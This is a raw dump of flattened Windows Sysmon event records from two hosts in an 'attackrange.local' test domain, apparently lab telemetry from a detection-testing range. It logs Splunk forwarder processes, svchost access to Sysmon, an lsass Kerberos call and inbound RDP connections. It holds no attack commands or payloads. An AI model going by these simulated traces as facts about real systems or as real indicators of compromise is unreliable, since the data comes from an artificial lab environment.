09:25:36.596{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001057209Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:25:36.596{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001057208Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:25:36.596{5EBD8912-8CBD-6151-0500-00000000FD01}416432C:\Windows\system32\csrss.exe{5EBD8912-8E10-6151-C700-00000000FD01}4444C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001057207Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:25:36.596{5EBD8912-8CD0-6151-3000-00000000FD01}19561552C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{5EBD8912-8E10-6151-C700-00000000FD01}4444C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001057206Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:25:36.596{5EBD8912-8E10-6151-C700-00000000FD01}4444C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{5EBD8912-8CBD-6151-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{5EBD8912-8CD0-6151-3000-00000000FD01}1956C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000001057205Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:25:36.033{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=40E333E86FD6F75DB74BD514C9D595AB,SHA256=2D6E1DB4EB7A32D4632967E2DD734D5568F88DEB144EAB21668B947F406CA010,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000981681Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:25:37.466{69CF5F33-7F2A-614D-2B00-00000000FD01}28562876C:\Windows\system32\conhost.exe{69CF5F33-8E11-6151-287A-00000000FD01}3476C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000981680Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:25:37.466{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000981679Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:25:37.466{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000981678Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:25:37.466{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000981677Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:25:37.466{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000981676Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:25:37.466{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000981675Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:25:37.466{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000981674Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:25:37.466{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000981673Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:25:37.466{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000981672Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:25:37.466{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000981671Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:25:37.466{69CF5F33-7F27-614D-0500-00000000FD01}408984C:\Windows\system32\csrss.exe{69CF5F33-8E11-6151-287A-00000000FD01}3476C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000981670Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:25:37.466{69CF5F33-7F29-614D-1D00-00000000FD01}19603060C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{69CF5F33-8E11-6151-287A-00000000FD01}3476C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000981669Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:25:37.453{69CF5F33-8E11-6151-287A-00000000FD01}3476C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{69CF5F33-7F27-614D-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{69CF5F33-7F29-614D-1D00-00000000FD01}1960C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000981668Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:25:37.107{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CD68D2E608E5ED1123AF5CAEF85C533D,SHA256=A30F94085BE07C246FD724924C6E47E8B150DC3AFBB0B0295A3C59F8EA0CE614,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001057215Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:25:37.455{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=92259A1FBCECD74BCDA998F254430704,SHA256=E8A6472B2291565EB67BDAA61E4E6D0B204079E8EC5A4C4705CC9BC60B815C09,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001057214Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:25:37.049{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=90D98F6A25B6902EB2EBA120CEA1DCBF,SHA256=14446AFD9E1B2EC2835588370069BA7F026EEE8FEA416D0B4DDF1FB7B4A61214,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001057217Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:25:36.101{5EBD8912-8CC0-6151-0F00-00000000FD01}300C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.231-58571-false10.0.1.14win-dc-429.attackrange.local3389ms-wbt-server 23542300x80000000000000001057216Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:25:38.049{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=773971DEEAD9CB38DFAC074C2DEED8FA,SHA256=6AA6A24C281059853BFE3A51337CCD6EFD722887D171129660CE3D87CB00EF3E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000981684Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:25:38.544{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=4BB732D1EFD9DA93CE77E237267B9AE6,SHA256=876CF412ABDE493E5BF35DD1D0911B35F93FD9D01D988AE607351DEAF1EF0DE7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000981683Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:25:38.544{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=161181E60913C3443A133B7CC00E9532,SHA256=9EFA10C8C51303D85899ECEFEBEE73861988347C58159F1C9D67DB8AB22A4B19,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000981682Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:25:38.107{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=81B657F76D166DBD7012E6E6BEEE2785,SHA256=68C5A13DCBC1827F34F725E9B32437FBCC3CF8157C280B573D5848A01E0235DF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001057220Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:25:39.877{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=9EA3F6C4DBCAC8AC89E04F9A5742CC6D,SHA256=0573C10B44B45045CC635E8EDA9F318C2115FA17CA7FCD4A896423C66862FABE,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001057219Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:25:37.023{5EBD8912-8CDC-6151-6E00-00000000FD01}2608C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-429.attackrange.local54279-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x80000000000000001057218Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:25:39.096{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=51C000F62B4341C0042AB9A260464C3C,SHA256=9BDE389C211B4553DCD031E5632B3E59478F7FD6CD677145639F1B57704CB1BA,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000981686Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:25:35.858{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.230-60631-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 23542300x8000000000000000981685Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:25:39.123{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C551EBCBCF2F81801143AED2F9E0E8D1,SHA256=5E17A2557C07370ACAE603A10ED49EC6167D40457150084682C8F6F06E33158B,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001057225Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:25:40.564{5EBD8912-8CBD-6151-0B00-00000000FD01}6402736C:\Windows\system32\lsass.exe{5EBD8912-8CA0-6151-0100-00000000FD01}4System0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\kerberos.DLL+96ef2|C:\Windows\system32\kerberos.DLL+793e4|C:\Windows\system32\kerberos.DLL+1443f|C:\Windows\system32\lsasrv.dll+2d211|C:\Windows\system32\lsasrv.dll+2b3d4|C:\Windows\system32\lsasrv.dll+30929|C:\Windows\system32\lsasrv.dll+2e287|C:\Windows\system32\lsasrv.dll+2d211|C:\Windows\system32\lsasrv.dll+15ded|C:\Windows\SYSTEM32\SspiSrv.dll+1a96|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e 10341000x80000000000000001057224Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 